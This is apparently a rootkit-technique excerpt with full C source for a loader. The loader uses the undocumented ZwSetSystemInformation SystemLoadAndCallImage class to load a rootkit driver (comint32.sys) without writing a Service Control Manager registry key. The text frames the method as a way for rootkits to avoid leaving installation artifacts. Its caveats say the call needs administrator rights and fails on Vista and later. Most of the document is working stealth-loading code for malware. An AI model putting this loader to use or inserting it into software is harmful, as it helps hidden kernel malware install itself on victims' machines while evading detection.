Rootkits installed through the Service Control Manager, like Ghost, leave a registry entry (the driver's service key) that is easy to find and remove. To avoid leaving that installation artifact, a startup executable can instead load the rootkit's driver image with ZwSetSystemInformation and the undocumented SystemLoadAndCallImage information class, bypassing the Service Control Manager entirely. Note what this does and does not buy: it is not a privilege-escalation technique — the caller still needs SeLoadDriverPrivilege (an administrator token); the loaded module remains visible in the kernel's loaded-module list, so only the service registry artifact is avoided; and this information class is reported to have been removed from Windows Vista and later, where driver signature enforcement also applies, so the call fails on modern systems. Here's the code:
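/*
 * Load a kernel driver image via the undocumented ZwSetSystemInformation
 * information class SystemLoadAndCallImage (class 38) instead of registering
 * a service with the Service Control Manager, so no service registry key is
 * written for the driver.
 *
 * Caveats for anyone reading this as a detection or hardening reference:
 *  - The caller still needs SeLoadDriverPrivilege (an administrator token);
 *    this is not a privilege-escalation primitive.
 *  - NOTE(review): this information class is reported to have been removed
 *    from Windows Vista and later, and 64-bit kernels enforce driver
 *    signing, so on modern systems the call fails (e.g. with an
 *    invalid-info-class or invalid-image-hash NTSTATUS) — confirm on the
 *    target build.
 *  - The loaded module is still visible in the kernel's loaded-module list;
 *    only the service registry artifact is avoided.
 *
 * Fixes relative to the original listing: main() now returns an exit code
 * (0 = loaded, 1 = not loaded) instead of being `void main`; ntdll is looked
 * up with the explicit ANSI GetModuleHandleA so the narrow literal compiles
 * under UNICODE builds; SystemInformationLength is ULONG as in the native
 * prototype; and the NTSTATUS is reported on failure instead of being
 * discarded.
 */
#include <windows.h>
#include <stdio.h>

/* Undocumented SYSTEM_INFORMATION_CLASS value used by the loader. */
#define SystemLoadAndCallImage 38

/* Native (NT) path of the driver image to load. Hard-coded, as in the original. */
#define DRIVER_IMAGE_PATH L"\\??\\C:\\comint32.sys"

typedef long NTSTATUS;

/* Counted UTF-16 string as used by the native API (same layout as ntdef.h). */
typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR  Buffer;
} UNICODE_STRING;

/* Input block for SystemLoadAndCallImage: just the module path. */
typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE {
    UNICODE_STRING ModuleName;
} SYSTEM_LOAD_AND_CALL_IMAGE;

/* Function-pointer types for the two ntdll exports resolved at run time. */
typedef VOID (__stdcall *RtlInitUnicodeString_t)(
    UNICODE_STRING *DestinationString,
    PCWSTR          SourceString);

typedef NTSTATUS (__stdcall *ZwSetSystemInformation_t)(
    ULONG SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength);

/*
 * Entry point.
 *
 * Returns 0 when ZwSetSystemInformation reports success (NTSTATUS >= 0),
 * 1 when either export cannot be resolved or the load fails. Prints the
 * same two status lines as the original, plus the NTSTATUS on failure.
 */
int main(void)
{
    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    if (ntdll == NULL) {
        fprintf(stderr, "GetModuleHandleA(ntdll.dll) failed: %lu\n", GetLastError());
        printf("MyDeviceDriver was not loaded!\n");
        return 1;
    }

    /* Both exports are resolved dynamically; either may be absent on a given build. */
    RtlInitUnicodeString_t   pRtlInitUnicodeString =
        (RtlInitUnicodeString_t)GetProcAddress(ntdll, "RtlInitUnicodeString");
    ZwSetSystemInformation_t pZwSetSystemInformation =
        (ZwSetSystemInformation_t)GetProcAddress(ntdll, "ZwSetSystemInformation");

    if (pRtlInitUnicodeString == NULL || pZwSetSystemInformation == NULL) {
        fprintf(stderr, "required ntdll export not found\n");
        printf("MyDeviceDriver was not loaded!\n");
        return 1;
    }

    WCHAR imagepath[] = DRIVER_IMAGE_PATH;
    SYSTEM_LOAD_AND_CALL_IMAGE request;
    pRtlInitUnicodeString(&request.ModuleName, imagepath);

    NTSTATUS status = pZwSetSystemInformation(SystemLoadAndCallImage,
                                              &request,
                                              sizeof request);
    /* NTSTATUS success codes are non-negative (NT_SUCCESS). */
    if (status >= 0) {
        printf("MyDeviceDriver loaded!\n");
        return 0;
    }

    fprintf(stderr, "ZwSetSystemInformation failed: NTSTATUS 0x%08lx\n", (unsigned long)status);
    printf("MyDeviceDriver was not loaded!\n");
    return 1;
}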